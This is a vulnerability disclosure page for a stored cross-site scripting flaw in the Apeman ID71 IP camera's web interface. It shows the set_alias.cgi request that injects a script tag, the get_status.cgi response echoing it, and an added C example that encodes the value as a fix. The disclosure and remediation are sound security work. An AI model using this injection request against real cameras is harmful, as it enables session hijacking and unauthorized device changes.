Submission #668771: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting

Title: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting
Description:

The camera’s web interface does not properly encode the user-supplied `alias` value before embedding it into JavaScript. When `alias` is set via `set_alias.cgi`, it is stored and later emitted by `get_status.cgi` as a JavaScript string without context-appropriate encoding. An authenticated attacker can inject arbitrary JavaScript that will execute in the browser of any user viewing pages that consume this variable, enabling session hijacking and unauthorized actions within the victim’s session.

To store the XSS we can use the following request:

```
# Request
GET /set_alias.cgi?alias=%3Cscript%3Ealert(1)%3C%2Fscript%3E&next_url=alias.htm&loginuse=admin&loginpas=XXXXXXXX HTTP/1.1
Host: 192.168.1.151:53370
```

To retrieve the stored value use the following request:

```
# Request
GET /get_status.cgi HTTP/1.1
Host: 192.168.1.151:53370
.....

# Response:
HTTP/1.1 200 OK
Date: Sat Oct 4 11:52:04 2025
Server: GoAhead-Webs

var alias="<script>alert(1)</script>";
var deviceid="VSTD1744XXXXX";
var sys_ver="x.x.x.x";
var app_version="EN75.8.53.20";
var oem_id="XXXX";
var now=17595XXXXXX;
...SNIP....
```

Impact

- Confidentiality: High — theft of session tokens, credentials, and configuration data
- Integrity: High — arbitrary actions in the victim’s authenticated context (change settings, add users)

Additional information and images: https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/XSS-Info.md

Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful. From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
Source: ⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
User: juliourena (UID 90207)
Submission: 04/10/2025 03:01 PM (8 months ago)
Moderation: 16/10/2025 01:29 PM (12 days later)
Status: Accepted
VulDB entry: 328797 [Apeman ID71 EN75.8.53.20 /set_alias.cgi alias cross site scripting]
Points: 20
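
The description attributes the flaw to `get_status.cgi` emitting `alias` as a JavaScript string without context-appropriate encoding. The following C code is an added example, not the vendor's firmware and not part of the submission, showing what that encoding looks like for a double-quoted JavaScript string literal. The function names `js_string_encode` and `format_alias_line` are hypothetical, and the response is assumed to be UTF-8.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Encode `in` for a double-quoted JavaScript string literal. ASCII letters,
 * digits and " _.,-" pass through; every other ASCII byte becomes \u00HH, so
 * quotes, backslashes, newlines and "</script>" cannot end the literal or the
 * script block. Bytes >= 0x80 are kept (assumes a UTF-8 response), except
 * U+2028/U+2029. Returns 0, or -1 if `out` is too small. */
int js_string_encode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    if (outlen == 0) return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char esc[16];
        if (p[0] == 0xE2 && p[1] == 0x80 && (p[2] == 0xA8 || p[2] == 0xA9)) {
            snprintf(esc, sizeof esc, "\\u20%02X", p[2] == 0xA8 ? 0x28 : 0x29);
            p += 2;
        } else if (*p >= 0x80 || isalnum(*p) || strchr(" _.,-", *p)) {
            esc[0] = (char)*p; esc[1] = '\0';
        } else {
            snprintf(esc, sizeof esc, "\\u%04X", (unsigned)*p);
        }
        size_t n = strlen(esc);
        if (o + n + 1 > outlen) { out[0] = '\0'; return -1; } /* fail closed */
        memcpy(out + o, esc, n);
        o += n;
    }
    out[o] = '\0';
    return 0;
}

/* Hypothetical helper: build the alias line of the get_status.cgi response. */
int format_alias_line(const char *alias, char *line, size_t linelen)
{
    char enc[256];
    if (js_string_encode(alias, enc, sizeof enc) != 0) enc[0] = '\0';
    int n = snprintf(line, linelen, "var alias=\"%s\";", enc);
    return (n < 0 || (size_t)n >= linelen) ? -1 : 0;
}

int main(void)
{
    char line[320];
    /* Constructed input: the alias value from the request shown on the page. */
    format_alias_line("<script>alert(1)</script>", line, sizeof line);
    puts(line);
    return 0;
}
```

Encoding the literal only keeps the value inside the string; a page that reads `alias` still has to insert it as text (for example through `textContent`) rather than as HTML.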
